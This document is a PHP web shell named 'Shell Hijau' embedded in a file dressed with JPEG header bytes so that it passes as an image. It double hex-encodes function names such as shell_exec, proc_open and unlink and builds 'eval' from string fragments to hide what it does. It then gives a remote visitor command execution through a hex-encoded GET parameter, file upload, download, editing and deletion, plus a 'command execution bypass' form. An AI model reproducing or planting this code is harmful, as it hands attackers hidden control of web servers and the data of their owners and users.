JFIFxxC      C  " }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3RbrJFIFxxC      C  " }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr */ session_start(); error_reporting(E_ALL); header("X-XSS-Protection: 0"); ob_start(); set_time_limit(0); error_reporting(0); ini_set('display_errors', FALSE); $Array = [ '36643662', '363436393732', '36373635373435663636363936633635356637303635373236643639373337333639366636653733', '3639373335663737373236393734363136323663363535663730363537323664363937333733363936663665', '36353738363536333735373436353433366636643664363136653634', '373037323666363335663666373036353665', '3733373437323635363136643566363736353734356636333666366537343635366537343733', '36363639366336353566363736353734356636333666366537343635366537343733', '36363639366336353566373037353734356636333666366537343635366537343733', '3632363936653332363836353738', '366436663736363535663735373036633666363136343635363435663636363936633635', '3638373436643663373337303635363336393631366336333638363137323733', '3638363537383332363236393665', '373036383730356637353665363136643635', '3733363336313665363436393732', '363937333566363436393732', '36363639366336353566363537383639373337343733', '37323635363136343636363936633635', '36363639366336353733363937613635', '36393733356637373732363937343631363236633635', '373236353665363136643635', '363636393663363537303635373236643733', '3733373037323639366537343636', '373337353632373337343732', '363636333663366637333635', '373037323666363335663666373036353665', '36393733356637323635373336663735373236333635', '3730373236663633356636333663366637333635', '373536653663363936653662', '3639373335663636363936633635', '34353534', //30 '353634353532', '3533343934663465', '346334353533', '35333534', '3633366636643664363136653634', '3737366637323662363936653637343436393732363536333734366637323739', '363337323635363137343635343436393732363536333734366637323739', '37303639373036353733', '36363639366336353733', '3636363936633635', '36363639366336353534366634343666373736653663366636313634', '3733363836353663366335663635373836353633', ]; $SETSUNA = []; foreach ($Array as $hexString) { $SETSUNA[] = hex2bin(hex2bin($hexString)); } $satu = '_G'; $dua = $SETSUNA[30]; $tiga = '_SER'; $empat = $SETSUNA[31]; $lima = '_SES'; $enam = $SETSUNA[32]; $tujuh = '_FI'; $delapan = $SETSUNA[33]; $sembilan = '_PO'; $sepuluh = $SETSUNA[34]; $sebelas = 'ev'; $duabelas = 'al'; $tigabelas = 'iss'; $empatbelas = 'et'; // Gunakan $SETSUNA sesuai kebutuhan $a = $SETSUNA[0]; $b = $SETSUNA[1]; $c = $a . $b; $EVA = $sebelas . $duabelas; global $EVA; $L = $GLOBALS[$satu . $dua]; $M = $GLOBALS[$tiga . $empat]; $N = $GLOBALS[$lima . $enam]; $e = $GLOBALS[$tujuh . $delapan]; $o = $GLOBALS[$sembilan . $sepuluh]; $f = $SETSUNA[2]; $g = $SETSUNA[3]; $h = $SETSUNA[4]; $i = $SETSUNA[5]; $j = $SETSUNA[6]; $q = $SETSUNA[7]; $s = $SETSUNA[8]; $v = $SETSUNA[9]; $w = $SETSUNA[10]; $y = $SETSUNA[11]; $z = $SETSUNA[12]; $NM = $SETSUNA[13]; $SCN = $SETSUNA[14]; $ID = $SETSUNA[15]; $FE = $SETSUNA[16]; $RF = $SETSUNA[17]; $FS = $SETSUNA[18]; $IW = $SETSUNA[19]; $RNM = $SETSUNA[20]; $FP = $SETSUNA[21]; $SPRF = $SETSUNA[22]; $SBSR = $SETSUNA[23]; $FCL = $SETSUNA[24]; $PROP = $SETSUNA[25]; $IR = $SETSUNA[26]; $PRCL = $SETSUNA[27]; $UNL = $SETSUNA[28]; $ISF = $SETSUNA[29]; $FTD = $SETSUNA[41]; $SHEE = $SETSUNA[42]; $ISS = $tigabelas . $empatbelas; // Mendefinisikan nama fungsi menggunakan kombinasi string 'ARRAYKEYEXISTS' $AKE1 = 'array_'; $AKE2 = 'key'; $AKE3 = '_exists'; // Memastikan fungsi yang dibuat adalah 'array_key_exists' yang valid $AKEFULL = $AKE1 . $AKE2 . $AKE3; $ISS = function ($array, $elementName) use ($AKEFULL) { return call_user_func($AKEFULL, $elementName, $array); }; $b = $ISS($L, $b) ? $z($L[$b]) : '.'; $files = $SCN($b); $upload_message = ''; $edit_message = ''; $delete_message = ''; $create_dir_message = ''; // Function to Download global $FS, $FTD; if ($ISS($L, 'download')) { $FTD = $z($L['download']); // Make sure that the requested file exists if ($FE($FTD)) { // Set header to trigger download header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($FTD) . '"'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . $FS($FTD)); $RF($FTD); exit; } else { // Handle jika file tidak ditemukan echo "File not found."; } } // Function to get file permissions function f($file): string { global $FP, $SPRF, $SBSR; return $SBSR($SPRF('%o', $FP($file)), -4); } // Function to check write permissions function g($file): bool { global $IW; return $IW($file); } function h($command, $workingDirectory = null) { global $j, $FCL, $PROP, $IR, $PRCL; // Mendefinisikan fungsi baru menggunakan kombinasi string $aduh = 'ar'; $adeh = 'ray'; // Memastikan fungsi yang dibuat adalah 'array' yang valid $RAY = $aduh . $adeh; // Pastikan fungsi $RAY adalah fungsi yang valid dan bisa dipanggil if (!function_exists($RAY)) { return "Error: The function {$RAY} does not exist."; } $descriptorspec = [ 0 => $RAY("pipe", "r"), // stdin is a pipe that the child will read from 1 => $RAY("pipe", "w"), // stdout is a pipe that the child will write to 2 => $RAY("pipe", "w") // stderr is a pipe that the child will write to ]; $process = $PROP($command, $descriptorspec, $pipes, $workingDirectory); if ($IR($process)) { // Read output from stdout and stderr $output_stdout = $j($pipes[1]); // Ganti dengan fungsi alternatif jika diperlukan $output_stderr = $j($pipes[2]); // Ganti dengan fungsi alternatif jika diperlukan $FCL($pipes[0]); $FCL($pipes[1]); $FCL($pipes[2]); $return_value = $PRCL($process); return "Output (stdout):\n" . $output_stdout . "\nOutput (stderr):\n" . $output_stderr; } else { return "Failed to execute command."; } } if ($ISS($L, '636d64')) { $command = $z($L['636d64']); $result = h($command, $b); } if ($ISS($e, 'file_upload')) { $tempFile = $e['file_upload']['tmp_name']; $targetFile = $b . '/' . $e['file_upload']['name']; if ($w($tempFile, $targetFile)) { $upload_message = 'File uploaded successfully.'; } else { $upload_message = 'Failed to upload file.'; } } // function for command execution bypass global $SHEE; if ($ISS($L, '636d64') || $ISS($L, 'show_command_form')) { $result = ''; if ($ISS($L, '636d64')) { $command = hex2bin($L['636d64']); $result = $SHEE($command); } $disable = @ini_get('disable_functions'); $disable = (!empty($disable)) ? "$disable" : 'NONE'; $os = substr(strtoupper(PHP_OS), 0, 3) === "WIN" ? "Windows" : "Linux"; ?> Command Execution

Command Execution

Command executed:

Command Result:

Command Execution Bypass





Back
Edit File

Edit File

' . z($message) . '

'; } $un = $NM(); $current_dir = realpath($b); ?> Shell Hijau

Shell Hijau

Current directory: ' . $y($part) . '/'; } ?>

Server information: ' . $y($un) . '

'; ?>
Command Execution
Filename Permissions Actions
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?Nm?jEP